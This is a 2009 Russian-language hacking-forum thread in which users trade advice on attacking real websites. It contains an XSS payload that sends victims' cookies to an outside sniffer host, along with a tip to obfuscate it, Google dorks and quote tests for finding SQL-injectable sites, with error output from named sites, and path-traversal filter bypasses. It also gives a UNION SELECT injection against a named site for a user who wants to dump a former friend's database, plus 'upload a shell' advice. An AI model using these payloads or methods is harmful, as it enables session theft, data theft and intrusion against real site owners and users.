Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. -m0rgan-

    -m0rgan- Elder - Старейшина

    Joined:
    29 Sep 2008
    Messages:
    514
    Likes Received:
    170
    Reputations:
    17
    Эм...если я не ошибаюсь, то там бйсик авторизация и пароли для входа в админку хранятся в файле htpasswd, а не в БД!
    (http://gnn.tv/admin)
     
    #6221 -m0rgan-, 31 Mar 2009
    Last edited: 31 Mar 2009
  2. Ershik

    Ershik Elder - Старейшина

    Joined:
    7 Nov 2007
    Messages:
    301
    Likes Received:
    46
    Reputations:
    6
    Нашел сайт, на котором в поле личных сообщений(социалка) выполняется html код, а следовательно и javascript
    Недолго думая залил xss снифер на хост, составил ссылку
    <script>window.location.href='http://htos.ru/sniffer/s.gif?'+document.cookie;</script>

    проверил ссылку на лок. компутере - работает, средиректил на настоящую фотографию.
    начал тестировать на сайте - пошли первые рога.
    Отчеты не приходят, хотя скрипт съедает чисто.

    Как это лечится?
    Снифер брал с http://pashkela.narod.ru/sniffer.rar
     
  3. -m0rgan-

    -m0rgan- Elder - Старейшина

    Joined:
    29 Sep 2008
    Messages:
    514
    Likes Received:
    170
    Reputations:
    17
    Мб, стоит зашифровать путь к снифферу?
     
    1 person likes this.
  4. Ershik

    Ershik Elder - Старейшина

    Joined:
    7 Nov 2007
    Messages:
    301
    Likes Received:
    46
    Reputations:
    6
    -m0rgan-, вы гений.
    Точно. Нужно было зашифровать строку.
    2 месяца непрерывной е**ли с сайтом и все так просто...
    Спасибо, -m0rgan-.
     
  5. Krist_ALL

    Krist_ALL Banned

    Joined:
    14 Jan 2009
    Messages:
    436
    Likes Received:
    193
    Reputations:
    24
    Я сталкнулся с такой проблемой. Я с трудом нахожу бажный скрипты с инекцией. Прочитал всякие faq по sql инжекшен да я и php с Mysql знаю нормально впринципе, но вт что-то с поиском не очень. Поделитесь соображениями как искать..Очень редко попадаются скрипты с уязвимостями.
     
  6. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    2Krist_ALL тут не раз уже обсуждалась эта тема, всем вопросам ответ гугл, вбей в поиск например .php?id= или .php?news= ну или как тебе угодно, конечно можешь сразу поискать MySql error in бла бла бла..но это уже паблик и не факт что сайт либо похеканый давно либо уже в бд не существует инфы для сайта, но для тренировки сойдет
     
  7. Krist_ALL

    Krist_ALL Banned

    Joined:
    14 Jan 2009
    Messages:
    436
    Likes Received:
    193
    Reputations:
    24
    Так и делаю. Но бажных скриптов почти не попадается! Все стойкие
     
  8. -m0rgan-

    -m0rgan- Elder - Старейшина

    Joined:
    29 Sep 2008
    Messages:
    514
    Likes Received:
    170
    Reputations:
    17
    Krist_ALL, позволю поправить Gorev'a.
    Для поиска по урлу в гугле используется команда inurl:
    Пример:
    inurl:news.php?id=1
    И пройдя по первой ссылке
    (http://ocenshik.mostpp.ru/news.php?id=1)
    Видим бажный скрипт:
    Code:
    http://ocenshik.mostpp.ru/news.php?id=1'
    Code:
    Warning: mysql_result(): supplied argument is not a valid MySQL result resource in /bhome/part1/01/mtpp/mostpp.ru/www/ocenshik/txh/part/news.txh on line 95
    
    Warning: mysql_result(): supplied argument is not a valid MySQL result resource in /bhome/part1/01/mtpp/mostpp.ru/www/ocenshik/txh/part/news.txh on line 97
    
    Warning: mysql_result(): supplied argument is not a valid MySQL result resource in /bhome/part1/01/mtpp/mostpp.ru/www/ocenshik/txh/part/news.txh on line 98
    
    Warning: mysql_result(): supplied argument is not a valid MySQL result resource in /bhome/part1/01/mtpp/mostpp.ru/www/ocenshik/txh/part/news.txh on line 99
    
    
    Warning: mysql_numrows(): supplied argument is not a valid MySQL result resource in /bhome/part1/01/mtpp/mostpp.ru/www/ocenshik/_functions.php on line 88
    
    по первой ссылке
    (www.globalwaterfoundation.org/news.php?id=1)
    Видим бажный скрипт:
    Code:
    www.globalwaterfoundation.org/news.php?id=1'
    Code:
    Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/gloh2o/public_html/news.php on line 190
    И так далее...
     
    #6228 -m0rgan-, 31 Mar 2009
    Last edited: 31 Mar 2009
    1 person likes this.
  9. Kraneg

    Kraneg Elder - Старейшина

    Joined:
    30 Aug 2008
    Messages:
    107
    Likes Received:
    97
    Reputations:
    21
    Krist_ALL, ну и я свои 5 копеек вставлю... то что бывает не находятся бажные скрипты абсолютно нормально =) не уязвим этот параметр, так узвим другой... то есть смотри на параметры и так далее, так же не забывай что ошибки не всегда выводятся иногда просто вырублен их вывод... поэтому стоит понаблюдать за выводом при разных значениях, грубо говоря что если при news.php?a=1' не выводится новость, а при news.php?a=1 выводится то это м.б. скуль =) хотя не факт =) короче все методом проб и ошибок =)
     
  10. -m0rgan-

    -m0rgan- Elder - Старейшина

    Joined:
    29 Sep 2008
    Messages:
    514
    Likes Received:
    170
    Reputations:
    17
    На счёт бажных скриптов, то не только кавычку пихать надо, есть и другие способы имитировать ошибку БД...по поводу этого можно почитать в замечательном FAQ от jokester'a (http://forum.antichat.ru/thread104591.html)
     
    #6230 -m0rgan-, 31 Mar 2009
    Last edited: 31 Mar 2009
  11. -m0rgan-

    -m0rgan- Elder - Старейшина

    Joined:
    29 Sep 2008
    Messages:
    514
    Likes Received:
    170
    Reputations:
    17
    2 Nightmarе
    можно попробывать закодировать ../ типа 0x2e2e2f
    но точно не уверен..
     
    1 person likes this.
  12. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    <?php
    $getfile = "%2E%2E%2F"; // =../

    $getfile = str_replace("..", "", $getfile);
    $getfile = str_replace("/", "", $getfile);

    echo $getfile;
    ?>
     
  13. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    на винде:

    lol=./.\file

    Схема такая это ./.\ пройдёт первую проверку без изменений, а после второй срежется "/".
    В итоге получим ..\

    Если нужно ещё выше, думаю всё понятно ./.\./.\./.\ и т.д.

    Тоесть "." впихнуть можно, а вот "/" будут резаться
     
    1 person likes this.
  14. Ershik

    Ershik Elder - Старейшина

    Joined:
    7 Nov 2007
    Messages:
    301
    Likes Received:
    46
    Reputations:
    6
    К теме о Xss
    Есть 3 имени cookie.
    PHPSESSID, .sait.ru_c_user, .sait.ru_c_password
    Как заставить скрипт записывать эти 3 параметра?:
    Супер переменная
    $sniffed['query'] = ($_SERVER['QUERY_STRING']);
    Записывает данные из PHPSESSID, как указать на то, чтобы она записывала данные из
    .sait.ru_c_user, .sait.ru_c_password?

    CMS платная, социалка ablespace
     
    2 people like this.
  15. slider

    slider Reservists Of Antichat

    Joined:
    4 Sep 2005
    Messages:
    501
    Likes Received:
    711
    Reputations:
    748
    Похожий вопрос ... можно ли как нибудь обойти =>

     
  16. hackmen

    hackmen Banned

    Joined:
    22 Oct 2007
    Messages:
    110
    Likes Received:
    46
    Reputations:
    1
    Сорри, если не туда запостил.

    Может есть у кого словарь с именами таблиц/полей.
    Был бы очень признателен и отблагодарил бы +. Ссылку в пм, пожалуйста.
     
  17. geezer.code

    geezer.code Elder - Старейшина

    Joined:
    22 Jan 2007
    Messages:
    552
    Likes Received:
    358
    Reputations:
    90
    https://forum.antichat.ru/thread93547.html
    пользуемся поиском.
    линк продублировал в пм.
     
    2 people like this.
  18. joomler

    joomler Member

    Joined:
    19 Feb 2009
    Messages:
    25
    Likes Received:
    5
    Reputations:
    3
    Доброго дня всем :)
    Подскажите как взломать сайт и слить его базу ?

    У меня есть все файлы от сайта
    Есть название и пароль от базы данных
    Скрипт новости выдает ошибку при запросе: http://www.rikor-electronics.ru/news.php?id=50'
    вот сама ошибка: .mysql_error().

    Еслиб был доступ к фтп то можно было бы залить шел, но у меня его нет :(
    Как вот с этими данными слить базу ? помогите... создатель этого сайта предал просто меня :(( а дружили с детства
     
  19. -m0rgan-

    -m0rgan- Elder - Старейшина

    Joined:
    29 Sep 2008
    Messages:
    514
    Likes Received:
    170
    Reputations:
    17
    http://www.rikor-electronics.ru/news.php?id=-50+union+select+version(),2,3,4--
    >>Есть название и пароль от базы данных
    Лей шелл и дампи бд)
     
  20. joomler

    joomler Member

    Joined:
    19 Feb 2009
    Messages:
    25
    Likes Received:
    5
    Reputations:
    3
    а как я не очень понимаю в этом?

    помогите пожалуйста я Вам подарю еще один сайт с паролями!
     
    #6240 joomler, 2 Apr 2009
    Last edited: 2 Apr 2009
    1 person likes this.
Thread Status:
Not open for further replies.